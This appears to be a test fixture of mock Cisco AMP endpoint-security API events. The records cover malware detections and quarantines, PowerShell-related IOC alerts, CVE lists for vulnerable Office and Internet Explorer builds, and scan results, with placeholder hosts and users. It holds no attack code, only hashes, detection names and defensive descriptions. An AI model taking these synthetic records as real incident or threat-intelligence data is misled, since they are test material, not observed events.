+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":684000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":682000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960","sha1":"5faebef3bb880489195e80e6656ccf442ff7123b","md5":"84b6f7be5370c1998886214790c6892b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15152998206589,"timestamp":1610534253,"timestamp_nanoseconds":0,"date":"2021-01-13T10:37:33+00:00","event_type":"Vulnerable Application 
Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610534253,"start_date":"2021-01-13T10:37:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"WINWORD.EXE","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2013","cve":"CVE-2014-0260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260"},{"cve":"CVE-2014-1761","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761"},{"cve":"CVE-2014-6357","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357"},{"cve":"CVE-2015-0085","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085"},{"cve":"CVE-2015-0086","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086"},{"cve":"CVE-2015-1641","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641"},{"cve":"CVE-2015-1650","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650"},{"cve":"CVE-2015-1682","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682"},{"cve":"CVE-2015-2379","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379"},{"cve":"CVE-2015-2380","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail
?vulnId=CVE-2015-2380"},{"cve":"CVE-2015-2424","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424"},{"cve":"CVE-2016-0127","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127"},{"cve":"CVE-2016-7193","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193"},{"cve":"CVE-2017-0292","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292"},{"cve":"CVE-2017-11826","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508159571352093000,"timestamp":1610533415,"timestamp_nanoseconds":349000000,"date":"2021-01-13T10:23:35+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298360312529000,"timestamp":1610532793,"timestamp_nanoseconds":312509000,"date":"2021-01-13T10:13:13+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610532793,"start_date":"2021-01-13T10:13:13+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298355162029000,"timestamp":1610532788,"timestamp_nanoseconds":162019000,"date":"2021-01-13T10:13:08+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610532788,"start_date":"2021-01-13T10:13:08+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508153524038140000,"timestamp":1610532007,"timestamp_nanoseconds":606000000,"date":"2021-01-13T10:00:07+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6508153524038139905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521062325693667300,"timestamp":1610447087,"timestamp_nanoseconds":693632000,"date":"2021-01-12T10:24:47+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610447087,"start_date":"2021-01-12T10:24:47+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6532910514396201000,"timestamp":1610446522,"timestamp_nanoseconds":872000000,"date":"2021-01-12T10:15:22+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.GenericKD:Malwaregen.21do.1201","detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"OLD.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9","sha1":"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c","md5":"cfdd16225e67471f5ef54cab9b3a5558"},"parent":{"process_id":2632,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef","sha1":"84123a3decdaa217e3588a1de59fe6cee1998004","md5":"38ae1b3c38faef56fe4907922f0385ba"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Auto.F2863A.211556.in02","detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"twhy.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117","sha1":"7d9518ea3f98d037745352b23861fab05d3777dc","md5":"c624d61b8f076c3ef05f74eeb96c8954"},"parent":{"process_id":4868,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132516139000,"timestamp":1608874241,"timestamp_nanoseconds":516130000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132474871000,"timestamp":1608874241,"timestamp_nanoseconds":474861000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. 
This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384389977,"timestamp":1608872547,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:27+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872547,"start_date":"2020-12-25T05:02:27+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet 
Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384371995,"timestamp":1608872546,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:26+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872546,"start_date":"2020-12-25T05:02:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193366641599,"timestamp":1608870773,"timestamp_nanoseconds":0,"date":"2020-12-25T04:32:53+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608870773,"start_date":"2020-12-25T04:32:53+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"OUTLOOK.EXE","identity":{"sha256":"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"},"parent":{"disposition":"Clean","identity":{"sha256":"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"}}},"vulnerabilities":[{"name":"Microsoft 
Office","version":"2016","cve":"CVE-2017-0106","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"},{"cve":"CVE-2017-11774","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774"},{"cve":"CVE-2017-8506","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506"},{"cve":"CVE-2017-8507","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507"},{"cve":"CVE-2017-8571","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571"},{"cve":"CVE-2017-8663","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663"},{"cve":"CVE-2018-0791","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525498672153625000,"timestamp":1608870165,"timestamp_nanoseconds":878000000,"date":"2020-12-25T04:22:45+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494703603843000,"timestamp":1608869241,"timestamp_nanoseconds":928000000,"date":"2020-12-25T04:07:21+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2872,"scanned_processes":49,"scanned_paths":0,"malicious_detections":0}}} 